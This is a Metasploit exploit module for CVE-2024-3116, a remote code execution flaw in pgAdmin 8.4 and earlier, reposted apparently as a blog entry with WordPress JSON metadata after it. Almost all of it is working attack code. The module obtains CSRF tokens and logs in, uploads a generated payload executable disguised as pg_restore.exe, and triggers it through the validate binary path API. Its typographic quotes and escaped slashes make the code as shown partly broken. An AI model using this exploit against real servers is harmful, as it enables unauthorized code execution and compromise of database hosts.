##
# This module requires Metasploit: https:\/\/metasploit.com\/download
# Current source: https:\/\/github.com\/rapid7\/metasploit-framework
##<\/p>\n
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking<\/p>\n
prepend Msf::Exploit::Remote::AutoCheck
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::FileDropper
include Msf::Exploit::EXE<\/p>\n
def initialize(info = {})
super(
update_info(
info,
‘Name’ => ‘pgAdmin Binary Path API RCE’,
‘Description’ => %q{
pgAdmin <= 8.4 is affected by a Remote Code Execution (RCE)
vulnerability through the validate binary path API. This vulnerability
allows attackers to execute arbitrary code on the server hosting PGAdmin,
posing a severe risk to the database management system’s integrity and the security of the underlying data.<\/p>\n
Tested on pgAdmin 8.4 on Windows 10 both authenticated and unauthenticated.
},
‘License’ => MSF_LICENSE,
‘Author’ => [
‘M.Selim Karahan’, # metasploit module
‘Mustafa Mutlu’, # lab prep. and QA
‘Ayoub Mokhtar’ # vulnerability discovery and write up
],
‘References’ => [
[ ‘CVE’, ‘2024-3116’],
[ ‘URL’, ‘https:\/\/ayoubmokhtar.com\/post\/remote_code_execution_pgadmin_8.4-cve-2024-3116\/’],
[ ‘URL’, ‘https:\/\/www.vicarius.io\/vsociety\/posts\/remote-code-execution-vulnerability-in-pgadmin-cve-2024-3116’]],
‘Platform’ => [‘windows’],
‘Arch’ => ARCH_X64,
‘Targets’ => [
[ ‘Automatic Target’, {}]],
‘DisclosureDate’ => ‘2024-03-28’,
‘DefaultTarget’ => 0,
‘Notes’ => {
‘Stability’ => [ CRASH_SAFE, ],
‘Reliability’ => [ REPEATABLE_SESSION, ],
‘SideEffects’ => [ ARTIFACTS_ON_DISK, CONFIG_CHANGES, IOC_IN_LOGS, ]}
)
)
register_options(
[
Opt::RPORT(8000),
OptString.new(‘USERNAME’, [ false, ‘User to login with’, ”]),
OptString.new(‘PASSWORD’, [ false, ‘Password to login with’, ”]),
OptString.new(‘TARGETURI’, [ true, ‘The URI of the Example Application’, ‘\/’])
])
end<\/p>\n
def check
version = get_version
return CheckCode::Unknown(‘Unable to determine the target version’) unless version
return CheckCode::Safe(“pgAdmin version #{version} is not affected”) if version >= Rex::Version.new(‘8.5’)<\/p>\n
CheckCode::Vulnerable(“pgAdmin version #{version} is affected”)
end<\/p>\n
def set_csrf_token_from_login_page(res)
if res&.code == 200 && res.body =~ \/csrfToken”: “([\\w+.-]+)”\/
@csrf_token = Regexp.last_match(1)
# at some point between v7.0 and 7.7 the token format changed
elsif (element = res.get_html_document.xpath(“\/\/input[@id=’csrf_token’]”)&.first)
@csrf_token = element[‘value’]end
end<\/p>\n
def set_csrf_token_from_config(res)
if res&.code == 200 && res.body =~ \/csrfToken”: “([\\w+.-]+)”\/
@csrf_token = Regexp.last_match(1)
# at some point between v7.0 and 7.7 the token format changed
else
@csrf_token = res.body.scan(\/pgAdmin\\[‘csrf_token’\\]\\s*=\\s*'([^’]+)’\/)&.flatten&.first
end
end<\/p>\n
def auth_required?
res = send_request_cgi(‘uri’ => normalize_uri(target_uri.path), ‘keep_cookies’ => true)
if res&.code == 302 && res.headers[‘Location’][‘login’]true
elsif res&.code == 302 && res.headers[‘Location’][‘browser’]false
end
end<\/p>\n
def on_windows?
res = send_request_cgi(‘uri’ => normalize_uri(target_uri.path, ‘browser\/js\/utils.js’), ‘keep_cookies’ => true)
if res&.code == 200
platform = res.body.scan(\/pgAdmin\\[‘platform’\\]\\s*=\\s*'([^’]+)’;\/)&.flatten&.first
return platform == ‘win32’
end
end<\/p>\n
def get_version
if auth_required?
res = send_request_cgi(‘uri’ => normalize_uri(target_uri.path, ‘login’), ‘keep_cookies’ => true)
else
res = send_request_cgi(‘uri’ => normalize_uri(target_uri.path, ‘browser\/’), ‘keep_cookies’ => true)
end
html_document = res&.get_html_document
return unless html_document && html_document.xpath(‘\/\/title’).text == ‘pgAdmin 4’<\/p>\n
# there’s multiple links in the HTML that expose the version number in the [X]XYYZZ,
# see: https:\/\/github.com\/pgadmin-org\/pgadmin4\/blob\/053b1e3d693db987d1c947e1cb34daf842e387b7\/web\/version.py#L27
versioned_link = html_document.xpath(‘\/\/link’).find { |link| link[‘href’] =~ \/\\?ver=(\\d?\\d)(\\d\\d)(\\d\\d)\/ }
return unless versioned_link<\/p>\n
Rex::Version.new(“#{Regexp.last_match(1).to_i}.#{Regexp.last_match(2).to_i}.#{Regexp.last_match(3).to_i}”)
end<\/p>\n
def csrf_token
return @csrf_token if @csrf_token<\/p>\n
if auth_required?
res = send_request_cgi(‘uri’ => normalize_uri(target_uri.path, ‘login’), ‘keep_cookies’ => true)
set_csrf_token_from_login_page(res)
else
res = send_request_cgi(‘uri’ => normalize_uri(target_uri.path, ‘browser\/js\/utils.js’), ‘keep_cookies’ => true)
set_csrf_token_from_config(res)
end
fail_with(Failure::UnexpectedReply, ‘Failed to obtain the CSRF token’) unless @csrf_token
@csrf_token
end<\/p>\n
def exploit
if auth_required? && !(datastore[‘USERNAME’].present? && datastore[‘PASSWORD’].present?)
fail_with(Failure::BadConfig, ‘The application requires authentication, please provide valid credentials’)
end<\/p>\n
if auth_required?
res = send_request_cgi({
‘uri’ => normalize_uri(target_uri.path, ‘authenticate\/login’),
‘method’ => ‘POST’,
‘keep_cookies’ => true,
‘vars_post’ => {
‘csrf_token’ => csrf_token,
’email’ => datastore[‘USERNAME’],
‘password’ => datastore[‘PASSWORD’],
‘language’ => ‘en’,
‘internal_button’ => ‘Login’
}
})<\/p>\n
unless res&.code == 302 && res.headers[‘Location’] != normalize_uri(target_uri.path, ‘login’)
fail_with(Failure::NoAccess, ‘Failed to authenticate to pgAdmin’)
end<\/p>\n
print_status(‘Successfully authenticated to pgAdmin’)
end<\/p>\n
unless on_windows?
fail_with(Failure::BadConfig, ‘This exploit is specific to Windows targets!’)
end
file_name = ‘pg_restore.exe’
file_manager_upload_and_trigger(file_name, generate_payload_exe)
rescue ::Rex::ConnectionError
fail_with(Failure::Unreachable, “#{peer} – Could not connect to the web service”)
end<\/p>\n
# file manager code is copied from pgadmin_session_deserialization module<\/p>\n
def file_manager_init
res = send_request_cgi({
‘uri’ => normalize_uri(target_uri.path, ‘file_manager\/init’),
‘method’ => ‘POST’,
‘keep_cookies’ => true,
‘ctype’ => ‘application\/json’,
‘headers’ => { ‘X-pgA-CSRFToken’ => csrf_token },
‘data’ => {
‘dialog_type’ => ‘storage_dialog’,
‘supported_types’ => [‘sql’, ‘csv’, ‘json’, ‘*’],
‘dialog_title’ => ‘Storage Manager’
}.to_json
})<\/p>\n
unless res&.code == 200 && (trans_id = res.get_json_document.dig(‘data’, ‘transId’)) && (home_folder = res.get_json_document.dig(‘data’, ‘options’, ‘homedir’))
fail_with(Failure::UnexpectedReply, ‘Failed to initialize a file manager transaction Id or home folder’)
end<\/p>\n
return trans_id, home_folder
end<\/p>\n
def file_manager_upload_and_trigger(file_path, file_contents)
trans_id, home_folder = file_manager_init<\/p>\n
form = Rex::MIME::Message.new
form.add_part(
file_contents,
‘application\/octet-stream’,
‘binary’,
“form-data; name=\\”newfile\\”; filename=\\”#{file_path}\\””
)
form.add_part(‘add’, nil, nil, ‘form-data; name=”mode”‘)
form.add_part(home_folder, nil, nil, ‘form-data; name=”currentpath”‘)
form.add_part(‘my_storage’, nil, nil, ‘form-data; name=”storage_folder”‘)<\/p>\n
res = send_request_cgi({
‘uri’ => normalize_uri(target_uri.path, “\/file_manager\/filemanager\/#{trans_id}\/”),
‘method’ => ‘POST’,
‘keep_cookies’ => true,
‘ctype’ => “multipart\/form-data; boundary=#{form.bound}”,
‘headers’ => { ‘X-pgA-CSRFToken’ => csrf_token },
‘data’ => form.to_s
})
unless res&.code == 200 && res.get_json_document[‘success’] == 1
fail_with(Failure::UnexpectedReply, ‘Failed to upload file contents’)
end<\/p>\n
upload_path = res.get_json_document.dig(‘data’, ‘result’, ‘Name’)
register_file_for_cleanup(upload_path)
print_status(“Payload uploaded to: #{upload_path}”)<\/p>\n
send_request_cgi({
‘uri’ => normalize_uri(target_uri.path, ‘\/misc\/validate_binary_path’),
‘method’ => ‘POST’,
‘keep_cookies’ => true,
‘ctype’ => ‘application\/json’,
‘headers’ => { ‘X-pgA-CSRFToken’ => csrf_token },
‘data’ => {
‘utility_path’ => upload_path[0..upload_path.size – 16]}.to_json
})<\/p>\n
true
end<\/p>\n
end<\/p>\n","protected":false},"excerpt":{"rendered":"
### This module requires Metasploit: https:\/\/metasploit.com\/download# Current source: https:\/\/github.com\/rapid7\/metasploit-framework## class MetasploitModule < Msf::Exploit::RemoteRank = ExcellentRanking prepend Msf::Exploit::Remote::AutoCheckinclude Msf::Exploit::Remote::HttpClientinclude Msf::Exploit::FileDropperinclude Msf::Exploit::EXE def initialize(info = {})super(update_info(info,‘Name’ => ‘pgAdmin Binary Path API RCE’,‘Description’ => %q{pgAdmin <= 8.4 is affected by a Remote Code Execution (RCE)vulnerability through the validate binary path API. This vulnerabilityallows attackers to execute arbitrary code …<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-59228","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/59228","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=59228"}],"version-history":[{"count":0,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/59228\/revisions"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=59228"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=59228"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=59228"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}